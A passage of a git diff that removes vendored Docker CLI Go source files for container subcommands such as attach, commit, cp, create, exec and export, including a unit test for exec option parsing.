dockerCli.ConfigFile().DetachKeys, - } - - var in io.ReadCloser - if options.Stdin { - in = dockerCli.In() - } - - if opts.proxy && !c.Config.Tty { - sigc := ForwardAllSignals(ctx, dockerCli, opts.container) - defer signal.StopCatch(sigc) - } - - resp, errAttach := client.ContainerAttach(ctx, opts.container, options) - if errAttach != nil && errAttach != httputil.ErrPersistEOF { - // ContainerAttach returns an ErrPersistEOF (connection closed) - // means server met an error and put it in Hijacked connection - // keep the error and read detailed error message from hijacked connection later - return errAttach - } - defer resp.Close() - - if c.Config.Tty && dockerCli.Out().IsTerminal() { - height, width := dockerCli.Out().GetTtySize() - // To handle the case where a user repeatedly attaches/detaches without resizing their - // terminal, the only way to get the shell prompt to display for attaches 2+ is to artificially - // resize it, then go back to normal. Without this, every attach after the first will - // require the user to manually resize or hit enter. - resizeTtyTo(ctx, client, opts.container, height+1, width+1, false) - - // After the above resizing occurs, the call to MonitorTtySize below will handle resetting back - // to the actual size. - if err := MonitorTtySize(ctx, dockerCli, opts.container, false); err != nil { - logrus.Debugf("Error monitoring TTY size: %s", err) - } - } - if err := holdHijackedConnection(ctx, dockerCli, c.Config.Tty, in, dockerCli.Out(), dockerCli.Err(), resp); err != nil { - return err - } - - if errAttach != nil { - return errAttach - } - - _, status, err := getExitCode(ctx, dockerCli, opts.container) - if err != nil { - return err - } - if status != 0 { - return cli.StatusError{StatusCode: status} - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/cmd.go b/vendor/github.com/docker/docker/cli/command/container/cmd.go deleted file mode 100644 index 3e9b4880ac..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/cmd.go +++ /dev/null @@ -1,46 +0,0 @@ -package container - -import ( - "github.com/spf13/cobra" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" -) - -// NewContainerCommand returns a cobra command for `container` subcommands -func NewContainerCommand(dockerCli *command.DockerCli) *cobra.Command { - cmd := &cobra.Command{ - Use: "container", - Short: "Manage containers", - Args: cli.NoArgs, - RunE: dockerCli.ShowHelp, - } - cmd.AddCommand( - NewAttachCommand(dockerCli), - NewCommitCommand(dockerCli), - NewCopyCommand(dockerCli), - NewCreateCommand(dockerCli), - NewDiffCommand(dockerCli), - NewExecCommand(dockerCli), - NewExportCommand(dockerCli), - NewKillCommand(dockerCli), - NewLogsCommand(dockerCli), - NewPauseCommand(dockerCli), - NewPortCommand(dockerCli), - NewRenameCommand(dockerCli), - NewRestartCommand(dockerCli), - NewRmCommand(dockerCli), - NewRunCommand(dockerCli), - NewStartCommand(dockerCli), - NewStatsCommand(dockerCli), - NewStopCommand(dockerCli), - NewTopCommand(dockerCli), - NewUnpauseCommand(dockerCli), - NewUpdateCommand(dockerCli), - NewWaitCommand(dockerCli), - newListCommand(dockerCli), - newInspectCommand(dockerCli), - NewPruneCommand(dockerCli), - ) - return cmd -} diff --git a/vendor/github.com/docker/docker/cli/command/container/commit.go b/vendor/github.com/docker/docker/cli/command/container/commit.go deleted file mode 100644 index cf8d0102a6..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/commit.go +++ /dev/null @@ -1,76 +0,0 @@ -package container - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - dockeropts "github.com/docker/docker/opts" - "github.com/spf13/cobra" -) - -type commitOptions struct { - container string - reference string - - pause bool - comment string - author string - changes dockeropts.ListOpts -} - -// NewCommitCommand creates a new cobra.Command for `docker commit` -func NewCommitCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts commitOptions - - cmd := &cobra.Command{ - Use: "commit [OPTIONS] CONTAINER [REPOSITORY[:TAG]]", - Short: "Create a new image from a container's changes", - Args: cli.RequiresRangeArgs(1, 2), - RunE: func(cmd *cobra.Command, args []string) error { - opts.container = args[0] - if len(args) > 1 { - opts.reference = args[1] - } - return runCommit(dockerCli, &opts) - }, - } - - flags := cmd.Flags() - flags.SetInterspersed(false) - - flags.BoolVarP(&opts.pause, "pause", "p", true, "Pause container during commit") - flags.StringVarP(&opts.comment, "message", "m", "", "Commit message") - flags.StringVarP(&opts.author, "author", "a", "", "Author (e.g., \"John Hannibal Smith \")") - - opts.changes = dockeropts.NewListOpts(nil) - flags.VarP(&opts.changes, "change", "c", "Apply Dockerfile instruction to the created image") - - return cmd -} - -func runCommit(dockerCli *command.DockerCli, opts *commitOptions) error { - ctx := context.Background() - - name := opts.container - reference := opts.reference - - options := types.ContainerCommitOptions{ - Reference: reference, - Comment: opts.comment, - Author: opts.author, - Changes: opts.changes.GetAll(), - Pause: opts.pause, - } - - response, err := dockerCli.Client().ContainerCommit(ctx, name, options) - if err != nil { - return err - } - - fmt.Fprintln(dockerCli.Out(), response.ID) - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/cp.go b/vendor/github.com/docker/docker/cli/command/container/cp.go deleted file mode 100644 index 17ab2accf9..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/cp.go +++ /dev/null @@ -1,303 +0,0 @@ -package container - -import ( - "fmt" - "io" - "os" - "path/filepath" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/system" - "github.com/spf13/cobra" -) - -type copyOptions struct { - source string - destination string - followLink bool -} - -type copyDirection int - -const ( - fromContainer copyDirection = (1 << iota) - toContainer - acrossContainers = fromContainer | toContainer -) - -type cpConfig struct { - followLink bool -} - -// NewCopyCommand creates a new `docker cp` command -func NewCopyCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts copyOptions - - cmd := &cobra.Command{ - Use: `cp [OPTIONS] CONTAINER:SRC_PATH DEST_PATH|- - docker cp [OPTIONS] SRC_PATH|- CONTAINER:DEST_PATH`, - Short: "Copy files/folders between a container and the local filesystem", - Long: strings.Join([]string{ - "Copy files/folders between a container and the local filesystem\n", - "\nUse '-' as the source to read a tar archive from stdin\n", - "and extract it to a directory destination in a container.\n", - "Use '-' as the destination to stream a tar archive of a\n", - "container source to stdout.", - }, ""), - Args: cli.ExactArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - if args[0] == "" { - return fmt.Errorf("source can not be empty") - } - if args[1] == "" { - return fmt.Errorf("destination can not be empty") - } - opts.source = args[0] - opts.destination = args[1] - return runCopy(dockerCli, opts) - }, - } - - flags := cmd.Flags() - - flags.BoolVarP(&opts.followLink, "follow-link", "L", false, "Always follow symbol link in SRC_PATH") - - return cmd -} - -func runCopy(dockerCli *command.DockerCli, opts copyOptions) error { - srcContainer, srcPath := splitCpArg(opts.source) - dstContainer, dstPath := splitCpArg(opts.destination) - - var direction copyDirection - if srcContainer != "" { - direction |= fromContainer - } - if dstContainer != "" { - direction |= toContainer - } - - cpParam := &cpConfig{ - followLink: opts.followLink, - } - - ctx := context.Background() - - switch direction { - case fromContainer: - return copyFromContainer(ctx, dockerCli, srcContainer, srcPath, dstPath, cpParam) - case toContainer: - return copyToContainer(ctx, dockerCli, srcPath, dstContainer, dstPath, cpParam) - case acrossContainers: - // Copying between containers isn't supported. - return fmt.Errorf("copying between containers is not supported") - default: - // User didn't specify any container. - return fmt.Errorf("must specify at least one container source") - } -} - -func statContainerPath(ctx context.Context, dockerCli *command.DockerCli, containerName, path string) (types.ContainerPathStat, error) { - return dockerCli.Client().ContainerStatPath(ctx, containerName, path) -} - -func resolveLocalPath(localPath string) (absPath string, err error) { - if absPath, err = filepath.Abs(localPath); err != nil { - return - } - - return archive.PreserveTrailingDotOrSeparator(absPath, localPath), nil -} - -func copyFromContainer(ctx context.Context, dockerCli *command.DockerCli, srcContainer, srcPath, dstPath string, cpParam *cpConfig) (err error) { - if dstPath != "-" { - // Get an absolute destination path. - dstPath, err = resolveLocalPath(dstPath) - if err != nil { - return err - } - } - - // if client requests to follow symbol link, then must decide target file to be copied - var rebaseName string - if cpParam.followLink { - srcStat, err := statContainerPath(ctx, dockerCli, srcContainer, srcPath) - - // If the destination is a symbolic link, we should follow it. - if err == nil && srcStat.Mode&os.ModeSymlink != 0 { - linkTarget := srcStat.LinkTarget - if !system.IsAbs(linkTarget) { - // Join with the parent directory. - srcParent, _ := archive.SplitPathDirEntry(srcPath) - linkTarget = filepath.Join(srcParent, linkTarget) - } - - linkTarget, rebaseName = archive.GetRebaseName(srcPath, linkTarget) - srcPath = linkTarget - } - - } - - content, stat, err := dockerCli.Client().CopyFromContainer(ctx, srcContainer, srcPath) - if err != nil { - return err - } - defer content.Close() - - if dstPath == "-" { - // Send the response to STDOUT. - _, err = io.Copy(os.Stdout, content) - - return err - } - - // Prepare source copy info. - srcInfo := archive.CopyInfo{ - Path: srcPath, - Exists: true, - IsDir: stat.Mode.IsDir(), - RebaseName: rebaseName, - } - - preArchive := content - if len(srcInfo.RebaseName) != 0 { - _, srcBase := archive.SplitPathDirEntry(srcInfo.Path) - preArchive = archive.RebaseArchiveEntries(content, srcBase, srcInfo.RebaseName) - } - // See comments in the implementation of `archive.CopyTo` for exactly what - // goes into deciding how and whether the source archive needs to be - // altered for the correct copy behavior. - return archive.CopyTo(preArchive, srcInfo, dstPath) -} - -func copyToContainer(ctx context.Context, dockerCli *command.DockerCli, srcPath, dstContainer, dstPath string, cpParam *cpConfig) (err error) { - if srcPath != "-" { - // Get an absolute source path. - srcPath, err = resolveLocalPath(srcPath) - if err != nil { - return err - } - } - - // In order to get the copy behavior right, we need to know information - // about both the source and destination. The API is a simple tar - // archive/extract API but we can use the stat info header about the - // destination to be more informed about exactly what the destination is. - - // Prepare destination copy info by stat-ing the container path. - dstInfo := archive.CopyInfo{Path: dstPath} - dstStat, err := statContainerPath(ctx, dockerCli, dstContainer, dstPath) - - // If the destination is a symbolic link, we should evaluate it. - if err == nil && dstStat.Mode&os.ModeSymlink != 0 { - linkTarget := dstStat.LinkTarget - if !system.IsAbs(linkTarget) { - // Join with the parent directory. - dstParent, _ := archive.SplitPathDirEntry(dstPath) - linkTarget = filepath.Join(dstParent, linkTarget) - } - - dstInfo.Path = linkTarget - dstStat, err = statContainerPath(ctx, dockerCli, dstContainer, linkTarget) - } - - // Ignore any error and assume that the parent directory of the destination - // path exists, in which case the copy may still succeed. If there is any - // type of conflict (e.g., non-directory overwriting an existing directory - // or vice versa) the extraction will fail. If the destination simply did - // not exist, but the parent directory does, the extraction will still - // succeed. - if err == nil { - dstInfo.Exists, dstInfo.IsDir = true, dstStat.Mode.IsDir() - } - - var ( - content io.Reader - resolvedDstPath string - ) - - if srcPath == "-" { - // Use STDIN. - content = os.Stdin - resolvedDstPath = dstInfo.Path - if !dstInfo.IsDir { - return fmt.Errorf("destination %q must be a directory", fmt.Sprintf("%s:%s", dstContainer, dstPath)) - } - } else { - // Prepare source copy info. - srcInfo, err := archive.CopyInfoSourcePath(srcPath, cpParam.followLink) - if err != nil { - return err - } - - srcArchive, err := archive.TarResource(srcInfo) - if err != nil { - return err - } - defer srcArchive.Close() - - // With the stat info about the local source as well as the - // destination, we have enough information to know whether we need to - // alter the archive that we upload so that when the server extracts - // it to the specified directory in the container we get the desired - // copy behavior. - - // See comments in the implementation of `archive.PrepareArchiveCopy` - // for exactly what goes into deciding how and whether the source - // archive needs to be altered for the correct copy behavior when it is - // extracted. This function also infers from the source and destination - // info which directory to extract to, which may be the parent of the - // destination that the user specified. - dstDir, preparedArchive, err := archive.PrepareArchiveCopy(srcArchive, srcInfo, dstInfo) - if err != nil { - return err - } - defer preparedArchive.Close() - - resolvedDstPath = dstDir - content = preparedArchive - } - - options := types.CopyToContainerOptions{ - AllowOverwriteDirWithFile: false, - } - - return dockerCli.Client().CopyToContainer(ctx, dstContainer, resolvedDstPath, content, options) -} - -// We use `:` as a delimiter between CONTAINER and PATH, but `:` could also be -// in a valid LOCALPATH, like `file:name.txt`. We can resolve this ambiguity by -// requiring a LOCALPATH with a `:` to be made explicit with a relative or -// absolute path: -// `/path/to/file:name.txt` or `./file:name.txt` -// -// This is apparently how `scp` handles this as well: -// http://www.cyberciti.biz/faq/rsync-scp-file-name-with-colon-punctuation-in-it/ -// -// We can't simply check for a filepath separator because container names may -// have a separator, e.g., "host0/cname1" if container is in a Docker cluster, -// so we have to check for a `/` or `.` prefix. Also, in the case of a Windows -// client, a `:` could be part of an absolute Windows path, in which case it -// is immediately proceeded by a backslash. -func splitCpArg(arg string) (container, path string) { - if system.IsAbs(arg) { - // Explicit local absolute path, e.g., `C:\foo` or `/foo`. - return "", arg - } - - parts := strings.SplitN(arg, ":", 2) - - if len(parts) == 1 || strings.HasPrefix(parts[0], ".") { - // Either there's no `:` in the arg - // OR it's an explicit local relative path like `./file:name.txt`. - return "", arg - } - - return parts[0], parts[1] -} diff --git a/vendor/github.com/docker/docker/cli/command/container/create.go b/vendor/github.com/docker/docker/cli/command/container/create.go deleted file mode 100644 index d5e63bd9ef..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/create.go +++ /dev/null @@ -1,218 +0,0 @@ -package container - -import ( - "fmt" - "io" - "os" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/command/image" - "github.com/docker/docker/pkg/jsonmessage" - // FIXME migrate to docker/distribution/reference - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/container" - networktypes "github.com/docker/docker/api/types/network" - apiclient "github.com/docker/docker/client" - "github.com/docker/docker/reference" - "github.com/docker/docker/registry" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/spf13/cobra" - "github.com/spf13/pflag" -) - -type createOptions struct { - name string -} - -// NewCreateCommand creates a new cobra.Command for `docker create` -func NewCreateCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts createOptions - var copts *runconfigopts.ContainerOptions - - cmd := &cobra.Command{ - Use: "create [OPTIONS] IMAGE [COMMAND] [ARG...]", - Short: "Create a new container", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - copts.Image = args[0] - if len(args) > 1 { - copts.Args = args[1:] - } - return runCreate(dockerCli, cmd.Flags(), &opts, copts) - }, - } - - flags := cmd.Flags() - flags.SetInterspersed(false) - - flags.StringVar(&opts.name, "name", "", "Assign a name to the container") - - // Add an explicit help that doesn't have a `-h` to prevent the conflict - // with hostname - flags.Bool("help", false, "Print usage") - - command.AddTrustedFlags(flags, true) - copts = runconfigopts.AddFlags(flags) - return cmd -} - -func runCreate(dockerCli *command.DockerCli, flags *pflag.FlagSet, opts *createOptions, copts *runconfigopts.ContainerOptions) error { - config, hostConfig, networkingConfig, err := runconfigopts.Parse(flags, copts) - if err != nil { - reportError(dockerCli.Err(), "create", err.Error(), true) - return cli.StatusError{StatusCode: 125} - } - response, err := createContainer(context.Background(), dockerCli, config, hostConfig, networkingConfig, hostConfig.ContainerIDFile, opts.name) - if err != nil { - return err - } - fmt.Fprintf(dockerCli.Out(), "%s\n", response.ID) - return nil -} - -func pullImage(ctx context.Context, dockerCli *command.DockerCli, image string, out io.Writer) error { - ref, err := reference.ParseNamed(image) - if err != nil { - return err - } - - // Resolve the Repository name from fqn to RepositoryInfo - repoInfo, err := registry.ParseRepositoryInfo(ref) - if err != nil { - return err - } - - authConfig := command.ResolveAuthConfig(ctx, dockerCli, repoInfo.Index) - encodedAuth, err := command.EncodeAuthToBase64(authConfig) - if err != nil { - return err - } - - options := types.ImageCreateOptions{ - RegistryAuth: encodedAuth, - } - - responseBody, err := dockerCli.Client().ImageCreate(ctx, image, options) - if err != nil { - return err - } - defer responseBody.Close() - - return jsonmessage.DisplayJSONMessagesStream( - responseBody, - out, - dockerCli.Out().FD(), - dockerCli.Out().IsTerminal(), - nil) -} - -type cidFile struct { - path string - file *os.File - written bool -} - -func (cid *cidFile) Close() error { - cid.file.Close() - - if !cid.written { - if err := os.Remove(cid.path); err != nil { - return fmt.Errorf("failed to remove the CID file '%s': %s \n", cid.path, err) - } - } - - return nil -} - -func (cid *cidFile) Write(id string) error { - if _, err := cid.file.Write([]byte(id)); err != nil { - return fmt.Errorf("Failed to write the container ID to the file: %s", err) - } - cid.written = true - return nil -} - -func newCIDFile(path string) (*cidFile, error) { - if _, err := os.Stat(path); err == nil { - return nil, fmt.Errorf("Container ID file found, make sure the other container isn't running or delete %s", path) - } - - f, err := os.Create(path) - if err != nil { - return nil, fmt.Errorf("Failed to create the container ID file: %s", err) - } - - return &cidFile{path: path, file: f}, nil -} - -func createContainer(ctx context.Context, dockerCli *command.DockerCli, config *container.Config, hostConfig *container.HostConfig, networkingConfig *networktypes.NetworkingConfig, cidfile, name string) (*container.ContainerCreateCreatedBody, error) { - stderr := dockerCli.Err() - - var containerIDFile *cidFile - if cidfile != "" { - var err error - if containerIDFile, err = newCIDFile(cidfile); err != nil { - return nil, err - } - defer containerIDFile.Close() - } - - var trustedRef reference.Canonical - _, ref, err := reference.ParseIDOrReference(config.Image) - if err != nil { - return nil, err - } - if ref != nil { - ref = reference.WithDefaultTag(ref) - - if ref, ok := ref.(reference.NamedTagged); ok && command.IsTrusted() { - var err error - trustedRef, err = image.TrustedReference(ctx, dockerCli, ref, nil) - if err != nil { - return nil, err - } - config.Image = trustedRef.String() - } - } - - //create the container - response, err := dockerCli.Client().ContainerCreate(ctx, config, hostConfig, networkingConfig, name) - - //if image not found try to pull it - if err != nil { - if apiclient.IsErrImageNotFound(err) && ref != nil { - fmt.Fprintf(stderr, "Unable to find image '%s' locally\n", ref.String()) - - // we don't want to write to stdout anything apart from container.ID - if err = pullImage(ctx, dockerCli, config.Image, stderr); err != nil { - return nil, err - } - if ref, ok := ref.(reference.NamedTagged); ok && trustedRef != nil { - if err := image.TagTrusted(ctx, dockerCli, trustedRef, ref); err != nil { - return nil, err - } - } - // Retry - var retryErr error - response, retryErr = dockerCli.Client().ContainerCreate(ctx, config, hostConfig, networkingConfig, name) - if retryErr != nil { - return nil, retryErr - } - } else { - return nil, err - } - } - - for _, warning := range response.Warnings { - fmt.Fprintf(stderr, "WARNING: %s\n", warning) - } - if containerIDFile != nil { - if err = containerIDFile.Write(response.ID); err != nil { - return nil, err - } - } - return &response, nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/diff.go b/vendor/github.com/docker/docker/cli/command/container/diff.go deleted file mode 100644 index 12d6591014..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/diff.go +++ /dev/null @@ -1,58 +0,0 @@ -package container - -import ( - "fmt" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/archive" - "github.com/spf13/cobra" -) - -type diffOptions struct { - container string -} - -// NewDiffCommand creates a new cobra.Command for `docker diff` -func NewDiffCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts diffOptions - - return &cobra.Command{ - Use: "diff CONTAINER", - Short: "Inspect changes on a container's filesystem", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.container = args[0] - return runDiff(dockerCli, &opts) - }, - } -} - -func runDiff(dockerCli *command.DockerCli, opts *diffOptions) error { - if opts.container == "" { - return fmt.Errorf("Container name cannot be empty") - } - ctx := context.Background() - - changes, err := dockerCli.Client().ContainerDiff(ctx, opts.container) - if err != nil { - return err - } - - for _, change := range changes { - var kind string - switch change.Kind { - case archive.ChangeModify: - kind = "C" - case archive.ChangeAdd: - kind = "A" - case archive.ChangeDelete: - kind = "D" - } - fmt.Fprintf(dockerCli.Out(), "%s %s\n", kind, change.Path) - } - - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/exec.go b/vendor/github.com/docker/docker/cli/command/container/exec.go deleted file mode 100644 index f0381494e2..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/exec.go +++ /dev/null @@ -1,207 +0,0 @@ -package container - -import ( - "fmt" - "io" - - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - apiclient "github.com/docker/docker/client" - options "github.com/docker/docker/opts" - "github.com/docker/docker/pkg/promise" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/spf13/cobra" -) - -type execOptions struct { - detachKeys string - interactive bool - tty bool - detach bool - user string - privileged bool - env *options.ListOpts -} - -func newExecOptions() *execOptions { - var values []string - return &execOptions{ - env: options.NewListOptsRef(&values, runconfigopts.ValidateEnv), - } -} - -// NewExecCommand creats a new cobra.Command for `docker exec` -func NewExecCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := newExecOptions() - - cmd := &cobra.Command{ - Use: "exec [OPTIONS] CONTAINER COMMAND [ARG...]", - Short: "Run a command in a running container", - Args: cli.RequiresMinArgs(2), - RunE: func(cmd *cobra.Command, args []string) error { - container := args[0] - execCmd := args[1:] - return runExec(dockerCli, opts, container, execCmd) - }, - } - - flags := cmd.Flags() - flags.SetInterspersed(false) - - flags.StringVarP(&opts.detachKeys, "detach-keys", "", "", "Override the key sequence for detaching a container") - flags.BoolVarP(&opts.interactive, "interactive", "i", false, "Keep STDIN open even if not attached") - flags.BoolVarP(&opts.tty, "tty", "t", false, "Allocate a pseudo-TTY") - flags.BoolVarP(&opts.detach, "detach", "d", false, "Detached mode: run command in the background") - flags.StringVarP(&opts.user, "user", "u", "", "Username or UID (format: [:])") - flags.BoolVarP(&opts.privileged, "privileged", "", false, "Give extended privileges to the command") - flags.VarP(opts.env, "env", "e", "Set environment variables") - flags.SetAnnotation("env", "version", []string{"1.25"}) - - return cmd -} - -func runExec(dockerCli *command.DockerCli, opts *execOptions, container string, execCmd []string) error { - execConfig, err := parseExec(opts, execCmd) - // just in case the ParseExec does not exit - if container == "" || err != nil { - return cli.StatusError{StatusCode: 1} - } - - if opts.detachKeys != "" { - dockerCli.ConfigFile().DetachKeys = opts.detachKeys - } - - // Send client escape keys - execConfig.DetachKeys = dockerCli.ConfigFile().DetachKeys - - ctx := context.Background() - client := dockerCli.Client() - - response, err := client.ContainerExecCreate(ctx, container, *execConfig) - if err != nil { - return err - } - - execID := response.ID - if execID == "" { - fmt.Fprintf(dockerCli.Out(), "exec ID empty") - return nil - } - - //Temp struct for execStart so that we don't need to transfer all the execConfig - if !execConfig.Detach { - if err := dockerCli.In().CheckTty(execConfig.AttachStdin, execConfig.Tty); err != nil { - return err - } - } else { - execStartCheck := types.ExecStartCheck{ - Detach: execConfig.Detach, - Tty: execConfig.Tty, - } - - if err := client.ContainerExecStart(ctx, execID, execStartCheck); err != nil { - return err - } - // For now don't print this - wait for when we support exec wait() - // fmt.Fprintf(dockerCli.Out(), "%s\n", execID) - return nil - } - - // Interactive exec requested. - var ( - out, stderr io.Writer - in io.ReadCloser - errCh chan error - ) - - if execConfig.AttachStdin { - in = dockerCli.In() - } - if execConfig.AttachStdout { - out = dockerCli.Out() - } - if execConfig.AttachStderr { - if execConfig.Tty { - stderr = dockerCli.Out() - } else { - stderr = dockerCli.Err() - } - } - - resp, err := client.ContainerExecAttach(ctx, execID, *execConfig) - if err != nil { - return err - } - defer resp.Close() - errCh = promise.Go(func() error { - return holdHijackedConnection(ctx, dockerCli, execConfig.Tty, in, out, stderr, resp) - }) - - if execConfig.Tty && dockerCli.In().IsTerminal() { - if err := MonitorTtySize(ctx, dockerCli, execID, true); err != nil { - fmt.Fprintf(dockerCli.Err(), "Error monitoring TTY size: %s\n", err) - } - } - - if err := <-errCh; err != nil { - logrus.Debugf("Error hijack: %s", err) - return err - } - - var status int - if _, status, err = getExecExitCode(ctx, client, execID); err != nil { - return err - } - - if status != 0 { - return cli.StatusError{StatusCode: status} - } - - return nil -} - -// getExecExitCode perform an inspect on the exec command. It returns -// the running state and the exit code. -func getExecExitCode(ctx context.Context, client apiclient.ContainerAPIClient, execID string) (bool, int, error) { - resp, err := client.ContainerExecInspect(ctx, execID) - if err != nil { - // If we can't connect, then the daemon probably died. - if !apiclient.IsErrConnectionFailed(err) { - return false, -1, err - } - return false, -1, nil - } - - return resp.Running, resp.ExitCode, nil -} - -// parseExec parses the specified args for the specified command and generates -// an ExecConfig from it. -func parseExec(opts *execOptions, execCmd []string) (*types.ExecConfig, error) { - execConfig := &types.ExecConfig{ - User: opts.user, - Privileged: opts.privileged, - Tty: opts.tty, - Cmd: execCmd, - Detach: opts.detach, - } - - // If -d is not set, attach to everything by default - if !opts.detach { - execConfig.AttachStdout = true - execConfig.AttachStderr = true - if opts.interactive { - execConfig.AttachStdin = true - } - } - - if opts.env != nil { - execConfig.Env = opts.env.GetAll() - } - - return execConfig, nil -} diff --git a/vendor/github.com/docker/docker/cli/command/container/exec_test.go b/vendor/github.com/docker/docker/cli/command/container/exec_test.go deleted file mode 100644 index baeeaf1904..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/exec_test.go +++ /dev/null @@ -1,116 +0,0 @@ -package container - -import ( - "testing" - - "github.com/docker/docker/api/types" -) - -type arguments struct { - options execOptions - execCmd []string -} - -func TestParseExec(t *testing.T) { - valids := map[*arguments]*types.ExecConfig{ - &arguments{ - execCmd: []string{"command"}, - }: { - Cmd: []string{"command"}, - AttachStdout: true, - AttachStderr: true, - }, - &arguments{ - execCmd: []string{"command1", "command2"}, - }: { - Cmd: []string{"command1", "command2"}, - AttachStdout: true, - AttachStderr: true, - }, - &arguments{ - options: execOptions{ - interactive: true, - tty: true, - user: "uid", - }, - execCmd: []string{"command"}, - }: { - User: "uid", - AttachStdin: true, - AttachStdout: true, - AttachStderr: true, - Tty: true, - Cmd: []string{"command"}, - }, - &arguments{ - options: execOptions{ - detach: true, - }, - execCmd: []string{"command"}, - }: { - AttachStdin: false, - AttachStdout: false, - AttachStderr: false, - Detach: true, - Cmd: []string{"command"}, - }, - &arguments{ - options: execOptions{ - tty: true, - interactive: true, - detach: true, - }, - execCmd: []string{"command"}, - }: { - AttachStdin: false, - AttachStdout: false, - AttachStderr: false, - Detach: true, - Tty: true, - Cmd: []string{"command"}, - }, - } - - for valid, expectedExecConfig := range valids { - execConfig, err := parseExec(&valid.options, valid.execCmd) - if err != nil { - t.Fatal(err) - } - if !compareExecConfig(expectedExecConfig, execConfig) { - t.Fatalf("Expected [%v] for %v, got [%v]", expectedExecConfig, valid, execConfig) - } - } -} - -func compareExecConfig(config1 *types.ExecConfig, config2 *types.ExecConfig) bool { - if config1.AttachStderr != config2.AttachStderr { - return false - } - if config1.AttachStdin != config2.AttachStdin { - return false - } - if config1.AttachStdout != config2.AttachStdout { - return false - } - if config1.Detach != config2.Detach { - return false - } - if config1.Privileged != config2.Privileged { - return false - } - if config1.Tty != config2.Tty { - return false - } - if config1.User != config2.User { - return false - } - if len(config1.Cmd) != len(config2.Cmd) { - return false - } - for index, value := range config1.Cmd { - if value != config2.Cmd[index] { - return false - } - } - return true -} diff --git a/vendor/github.com/docker/docker/cli/command/container/export.go b/vendor/github.com/docker/docker/cli/command/container/export.go deleted file mode 100644 index 8fa2e5d77e..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/export.go +++ /dev/null @@ -1,59 +0,0 @@ -package container - -import ( - "errors" - "io" - - "golang.org/x/net/context" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -type exportOptions struct { - container string - output string -} - -// NewExportCommand creates a new `docker export` command -func NewExportCommand(dockerCli *command.DockerCli) *cobra.Command { - var opts exportOptions - - cmd := &cobra.Command{ - Use: "export [OPTIONS] CONTAINER", - Short: "Export a container's filesystem as a tar archive", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.container = args[0] - return runExport(dockerCli, opts) - }, - } - - flags := cmd.Flags() - - flags.StringVarP(&opts.output, "output", "o", "", "Write to a file, instead of STDOUT") - - return cmd -} - -func runExport(dockerCli *command.DockerCli, opts exportOptions) error { - if opts.output == "" && dockerCli.Out().IsTerminal() { - return errors.New("Cowardly refusing to save to a terminal. Use the -o flag or redirect.") - } - - clnt := dockerCli.Client() - - responseBody, err := clnt.ContainerExport(context.Background(), opts.container) - if err != nil { - return err - } - defer responseBody.Close() - - if opts.output == "" { - _, err := io.Copy(dockerCli.Out(), responseBody) - return err - } - - return command.CopyToFile(opts.output, responseBody) -} diff --git a/vendor/github.com/docker/docker/cli/command/container/hijack.go b/vendor/github.com/docker/docker/cli/command/container/hijack.go deleted file mode 100644 index ca136f0e43..0000000000 --- a/vendor/github.com/docker/docker/cli/command/container/hijack.go +++ /dev/null @@ -1,116 +0,0 @@ -package container - -import ( - "io" - "runtime" - "sync" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/pkg/stdcopy" - "golang.org/x/net/context" -) - -// holdHijackedConnection handles copying input to and output from streams to the -// connection -func holdHijackedConnection(ctx context.Context, streams command.Streams, tty bool, inputStream io.ReadCloser, outputStream, errorStream io.Writer, resp types.HijackedResponse) error { - var ( - err error - restoreOnce sync.Once - ) - if inputStream != nil && tty { - if err := setRawTerminal(streams); err != nil { - return err - } - defer func() { - restoreOnce.Do(func() { - restoreTerminal(streams, inputStream) - }) - }() - } - - receiveStdout := make(chan error, 1) - if outputStream != nil || errorStream != nil { - go func() { - // When TTY is ON, use regular copy - if tty && outputStream != nil { - _, err = io.Copy(outputStream, resp.Reader) - // we should restore the terminal as soon as possible once connection end - // so any following print messages will be in normal type. - if inputStream != nil { - restoreOnce.Do(func() { - restoreTerminal(streams, inputStream) - }) - } - } else { - _, err = stdcopy.StdCopy(outputStream, errorStream, resp.Reader) - } - - logrus.Debug("[hijack] End of stdout") - receiveStdout <- err - }() - } - - stdinDone := make(chan struct{}) - go func() { - if inputStream != nil { - io.Copy(resp.Conn, inputStream) - // we should restore the terminal as soon as possible once connection end - // so any following print messages will be in normal type. - if tty 